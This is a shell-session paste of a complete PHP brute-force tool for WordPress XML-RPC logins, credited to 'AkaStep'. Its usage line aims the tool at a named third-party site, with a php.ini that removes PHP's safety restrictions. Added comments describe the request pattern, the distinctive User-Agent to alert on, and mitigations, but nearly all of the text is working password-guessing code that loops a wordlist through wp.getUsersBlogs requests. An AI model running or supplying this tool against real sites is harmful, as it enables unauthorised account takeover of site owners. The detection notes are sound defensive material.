- Usage:
- [blackhat@fedora tmp]$ php -c ~/shellz/xmlrpcbrutewp/php.ini -f /tmp/brut.php admin /home/blackhat/Desktop/founds/1.txt http://verona.am/xmlrpc.php
- $ cat ~/shellz/xmlrpcbrutewp/php.ini
- safe_mode = off
- open_basedir=
- disable_functions=
- [blackhat@fedora ~]$ cat /tmp/brut.php
- <?php
- /*
- Wordpress xmlrpc Bruteforce tool
- Coded by AkaStep
- ----
- What the listing does: takes a username, a wordlist path and an
- xmlrpc.php URL from the command line, then sends one XML-RPC
- wp.getUsersBlogs POST per wordlist line and stops at the first
- response that lacks the text 'Incorrect username or password'.
- ----
- What this traffic looks like from the server side (all visible below):
-   * one POST to the xmlrpc.php URL per guess, sent one after another,
-     always with the same username;
-   * methodName wp.getUsersBlogs in every request body;
-   * a fixed, distinctive User-Agent string on every request.
- A run of wp.getUsersBlogs authentication faults for one account is the
- pattern to alert on. Rate-limiting or blocking xmlrpc.php where XML-RPC
- is not needed, together with login throttling, removes the exposure.
- */
- // Silence all PHP errors and notices for the whole run.
- error_reporting(0);
- // Presumably raised because file() below loads the entire wordlist into memory.
- ini_set('memory_limit', '6000M');
- // Remove the execution time limit.
- set_time_limit(0);
- // Usage text and ANSI-coloured banner. The non-English strings are runtime
- // output (apparently Azerbaijani: usage instructions and a hint about the
- // ?author=1 author archive); they are left exactly as written.
- $usage='php -f script.php username luget.txt http://domain.adi/xmlrpc.php';
- $banner=chr(27) ."[42m" . str_repeat('#',60) . PHP_EOL . ' **************** WORDPRESS XMLRPC BRUTEFORCE TOOL **************' . PHP_EOL .
- ' ********************* Istifade qaydasi ********************'.
- PHP_EOL .$usage . PHP_EOL .
- ' ****************************************************'. PHP_EOL .
- 'Hint: VALID ISTIFADECI ADI: http://domain.adi/?author=1 GRAB ET ' . chr(27) . "[0m" .PHP_EOL ;
- // Positional arguments: username, wordlist path, target URL. They are read
- // before the argument count is checked; with fewer than three arguments the
- // script prints the banner and exits.
- $uname=$argv[1];
- $luget=$argv[2];
- $hedef=$argv[3];
- if(count($argv) < 4){ die(PHP_EOL . $banner . PHP_EOL);}
- echo $banner;
- // Read the wordlist into an array of lines; the die() text is runtime output
- // (apparently "cannot open the wordlist file").
- $luget=file($luget) or die('Luget Fayli Aca bilmirem!');
- // Attempt counter; the first $i++ in the loop turns NULL into 1.
- $i=NULL;
- // One HTTP request per wordlist line, each on a freshly created curl handle.
- foreach($luget as $pass)
- {
- $i++;
- $ch = curl_init();
- $curlConfig = array(
- CURLOPT_URL => $hedef,
- CURLOPT_POST => true,
- CURLOPT_RETURNTRANSFER => true,
- // Each request is abandoned after 5 seconds.
- CURLOPT_TIMEOUT => 5,
- // Constant User-Agent: it appears verbatim in web server access logs, so
- // requests from this listing can be matched on this string alone.
- CURLOPT_USERAGENT => 'MSIE 8 GECKO 9 BRUTEFORCE TRY MOZILLA GECKO BLAH LINUX PENTEST',
- // XML-RPC body: a wp.getUsersBlogs call whose two string params are the
- // username and the current wordlist line.
- CURLOPT_POSTFIELDS => '<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>
- <string>' . $uname . '</string></value></param>
- <param><value><string>' . $pass . '</string></value></param></params>
- </methodCall>');
- curl_setopt_array($ch, $curlConfig);
- $result = curl_exec($ch);
- // Split the response into lines and keep line index 11 with the
- // <value><string> wrappers removed (presumably the fault message line);
- // this depends on the exact line layout of the server's response.
- $massiv=explode(PHP_EOL,$result);
- $result0=str_ireplace(array('<value><string>',
- '</string></value>'),'',(string)$massiv[11]);
- //echo var_dump($massiv);
- // On attempts 1, 11, 21, ... print the target URL on a yellow background,
- // keeping only letters, digits, '.', ':' and '/'.
- if($i % 10==1) {
- echo chr(27) . "[43m" . ' HEDEF => ' . preg_replace('/[^A-Za-z0-9\.\\:\\/]/i','',(string)$hedef). chr(27) . "[0m" .PHP_EOL;
- }
- // Negative match: any response that does not contain the failure text ends
- // the run with the "found" (TAPILDI) message, so that output alone is not
- // proof that a credential was accepted. Response line index 7 is printed
- // with the <member>/<boolean> wrappers and all non-letters removed.
- if(!stristr($result,'Incorrect username or password')) die(PHP_EOL .chr(27) . "[42m" . '=======> TAPILDI! Username: ' . $uname . ' PAROL => ' . $pass . ' ==> Saytdan cavab:[ ' .
- preg_replace('/[^A-Za-z]/i','',str_ireplace(array('<member><name>',
- '</name>','<value><boolean>','</boolean></value></member>'),'',(string)$massiv[7])) . ' ] ' . ' <======= ' . PHP_EOL . 'HEDEF: ' . $hedef. chr(27) . "[0m" .PHP_EOL);
- // Per-attempt progress line on a red background: counter, username, the
- // trimmed wordlist entry and the message extracted from the response.
- echo chr(27) . "[41m" . '[ ' . $i . ' ] USERNAME: ' . $uname . ' PAROL QISMINDE: ' . trim($pass) . ' ==> Saytdan cavab:[ ' . trim($result0) . ' ] ' . chr(27) . "[0m" . PHP_EOL ;
- curl_close($ch);
- }
- // Drop the loop variable once the wordlist has been exhausted.
- unset($pass);
- ?>